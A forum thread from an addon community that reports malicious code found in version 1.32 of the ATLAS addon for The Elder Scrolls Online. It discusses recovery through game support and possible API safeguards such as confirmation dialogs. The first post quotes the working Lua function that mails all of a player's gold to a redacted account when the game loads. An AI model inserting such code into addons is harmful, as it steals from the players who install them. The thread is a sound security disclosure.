Thread Tools Display Modes
12/03/14, 09:48 PM   #1
Sasky
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 231
Malicious code in latest ATLAS (1.32)

@Cairenn or moderators -- tried PM first, delete this thread if needed once action taken.

Until one of the admins can remove the file (at least), disable ATLAS or make sure it does not update to version 1.32.

The latest version of ATLAS has the following malicious code in it:
Lua Code:
  1. function ATLAS:EVENT_PLAYER_ACTIVATED(...)
  2.     d("|cFF2222ATLAS|r addon Loaded, /atlas for more info")
  3.         RequestOpenMailbox()   
  4.         QueueMoneyAttachment(GetCurrentMoney())
  5.         SendMail("<REDACTED>", "..")   
  6.     --
  7.     -- Only once so unreg is from further events
  8.     --
  9.     EVENT_MANAGER:UnregisterForEvent( ATLAS.addonName, EVENT_PLAYER_ACTIVATED )
  10. end

For those who don't understand LUA, when the game loads in, it sends a mail with all gold in your bag to a specific player.

I've submitted a ticket and talked to a GM to report the account the gold was sent to.
  Reply With Quote
12/03/14, 10:05 PM   #2
HyperToxic
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 1
I was robbed.

I updated this add-on before reading this and my gold is missing.
  Reply With Quote
12/03/14, 10:14 PM   #3
Sasky
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 231
If you do lose your gold, disable the addon then contact a GM using the in-game 'Ask for Help'. Someone responded fairly quickly was able to restore the gold. Asked to logoff 5min or so to restore it and when logged back it in was there. The GM did indicate they were taking actions on their end -- whether banning or some form of bulk restore to everyone who sent mail to that person I don't know.
  Reply With Quote
12/03/14, 10:46 PM   #4
Cairenn
Credendo Vides
 
Cairenn's Avatar
Premium Member
WoWInterface Admin
Join Date: Mar 2004
Posts: 437
Yeah, I've already pulled it. Will be speaking with the 'author' shortly, just in the middle of something else right now.
  Reply With Quote
12/03/14, 10:50 PM   #5
TribeofOne
Join Date: Mar 2014
Posts: 41
Thank you for the warning. Hope all those whom this effected get help.

Now that we know this can happen how do we protect ourselves?

Last edited by TribeofOne : 12/03/14 at 11:09 PM.
  Reply With Quote
12/03/14, 10:53 PM   #6
TribeofOne
Join Date: Mar 2014
Posts: 41
Originally Posted by Cairenn View Post
Yeah, I've already pulled it. Will be speaking with the 'author' shortly, just in the middle of something else right now.

Cairenn the "unredacted" code is showing up in several comments on the ATLAS page. you may want to mod those or lock it. Id hate for someone else to take that code and add it to other addons and upload it.
  Reply With Quote
12/04/14, 12:53 AM   #7
rkuhnjr
 
rkuhnjr's Avatar
AddOn Author - Click to view addons
Join Date: Nov 2014
Posts: 26
Im surprised its that easy to trigger a mail with all your gold via an addon, i mean its literally just three lines of code...


Thanks for the heads up.
  Reply With Quote
12/04/14, 01:31 AM   #8
Ayantir
 
Ayantir's Avatar
AddOn Author - Click to view addons
Join Date: Jul 2014
Posts: 1,019
Thumbs down

Very bad news, what that guy think ?

Ok, writing this kind of code need ~1h starting from 0 in LUA,

But it's also require 2-3 ZOS GM, your account definitively banned in less than 10 minutes, and now ZOS will get their reflexion on "Should we disable functionnality of sending items and gold in addons ?". ESOUI don't need this kind of people here. We're all volunteers and spend time to prevent this things is really boring.

Okay, we got a problem with dev who leave and no one to take back their work, but seriously, I'm addon dev, if I leave ESO tomorrow, I don't want someone like this being in charge of my work. We're few and it's not easy, lot of us stop their work because maintaining addon is a time gap for us.

I got a 10hours work destroyed because one of my functions was also used by goldsellers, and if in next release some functions will go to private we'll know where it comes from.

It sucks.
  Reply With Quote
12/04/14, 04:11 PM   #9
ZOS_ChipHilseberg
ZOS Staff!
Premium Member
Yes this person is from ZeniMax!
Join Date: Oct 2014
Posts: 551
Hey all. I wanted to let you know that this is on our radar on the code side and we've been discussing it internally. We of course believe in protecting players from malicious add-ons. However, it is also important to acknowledge that security often comes at the cost of restricted functionality. By making the mail attachment functions private would could prevent this behavior in the future. However, this would also prevent any sort of automated item or gold mailing add-on. In this particular case, it may be worth sacrificing the functionality for extra protection, but I first wanted to ask your opinions on the value of having accessible functions for managing mail attachments specifically. How useful are they to your existing or planned add-ons?
  Reply With Quote
12/04/14, 04:23 PM   #10
Randactyl
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 251
I could concede access to a function that mails gold.

However, say I wanted to write something that would automatically send some items of type x to my group mate for immediate return who is dungeon farming with me (thus clearing some inventory space and allowing us to continue looking for Dwemer Scrap). I would like to retain access to an attachment function that only allows items to be attached without user input.

Or, just had this idea while replying, maybe change the attachment function to be a wrapper for a protected or private function that produces a confirmation dialog before any items/gold are attached to a mail? That way it shouldn't be able to be overwritten to remove the check.
  Reply With Quote
12/04/14, 04:49 PM   #11
Garkin
 
Garkin's Avatar
AddOn Author - Click to view addons
Join Date: Mar 2014
Posts: 832
All I want is confirmation dialog when you sending mail with attachment.
It would be better if you can do that without making functions private. However as for me, I really do not mind if addons can't send attachments at all. Automated sending items just to clear bag space is convenient, but also sort of cheating.
  Reply With Quote
12/04/14, 04:57 PM   #12
Randactyl
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 251
I can see the viewpoint that it is "cheating." My main point I guess was that I don't think a machete needs to be taken to the API again.

If this function needs to die, okay. But I would at least like all options to be explored first - in this case a confirmation dialog that cannot end up overwritten and skipped.
  Reply With Quote
12/04/14, 06:22 PM   #13
TribeofOne
Join Date: Mar 2014
Posts: 41
Im not a ui author but I am a user of quiet a few addons that at this point I wouldnt want to play without. I would rather have better inventory solutions like maybe more space as in per character and account bank space and a send to bank option from inventory.
As for this particular issue, a confirmation click that cant be automated would seem fair. It would help protect people but still allow legit use.
  Reply With Quote
12/04/14, 07:45 PM   #14
Sasky
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 231
Best solution would be a confirmation on send instead of attach. It'd kick in whenever the mail being sent has gold attached. The dialog would also have to be protected from any addon access (so it can't be automated).

This could potentially be extended to items, but that's not as critical from two fronts: 1) it's more difficult to send high-value items than a bunch of gold and 2) people do use it for inventory management. I'm not sure the risk/impact warrants it, unless it's implemented as optional from the settings. In which case, each user would decide for themselves whether it's worth the risk.

If functions do need to be made private, the SendMail() function itself would be plenty to stop it. That way the addon could prepare the mail and let the user hit send, similar to how chat is blocked off. This would have the most impact on fully automated addons like Wykkyd's mail return and the GuildMail addons. Both of those are fairly well-used to save a lot of time, so it'd probably annoy a few people.
  Reply With Quote
12/05/14, 01:47 AM   #15
Anex
 
Anex's Avatar
Join Date: Apr 2014
Posts: 4
I'm going to agree with the confirmation on attach. It seems the best and easiest way to please everyone and still be safe.
  Reply With Quote
12/05/14, 04:03 AM   #16
BornDownUnder
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 59
Post

Definitely a private function that is the backbone of any mail attachment, this would leave mass mailing addons such as mailR alone, allowing for guild automation in sending out notifications, etc.

In saying that, I can foresee Wykkyd being quite unhappy with a dialogue box being thrown up on every mail that has attachment, would be good to see input from Wykkyd here.

On the note of mailing, could you please add a @name <Guild Association>... It would assist greatly in recognition of players from in-guild when dealing with mail.
  Reply With Quote
12/05/14, 05:11 AM   #17
CrazyDutchGuy
 
CrazyDutchGuy's Avatar
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 89
Whether wykkyd likes it or not is not the question. The functionality that he uses can also be used to send specific items or gold to a random person for his own gain.

A confirmation box with the full mail message/attachments is what you want, if you want to prevent this.

Note that i used the mail functionality in the past to send loot information to my account. If the mail is text only then you can question if it should be confirmed by a dialog box.
  Reply With Quote
12/05/14, 05:37 AM   #18
Criscal
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 14
confirmation

Hi,

A confirmation dialogue is the solution I would like best. It would be even more fun if you could give each add-on certain permissions and in case of lack of permission put out an error notification window that tells you if the add-on tried something and which permission would be required.
  Reply With Quote
12/05/14, 01:19 PM   #19
ZOS_ChipHilseberg
ZOS Staff!
Premium Member
Yes this person is from ZeniMax!
Join Date: Oct 2014
Posts: 551
Thank you all for the replies. We'll be looking into a secure confirmation for mails with attachments.
  Reply With Quote
12/05/14, 02:01 PM   #20
Randactyl
AddOn Author - Click to view addons
Join Date: Apr 2014
Posts: 251
Thanks for thinking of us!
  Reply With Quote

ESOUI » Developer Discussions » General Authoring Discussion » Malicious code in latest ATLAS (1.32)

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off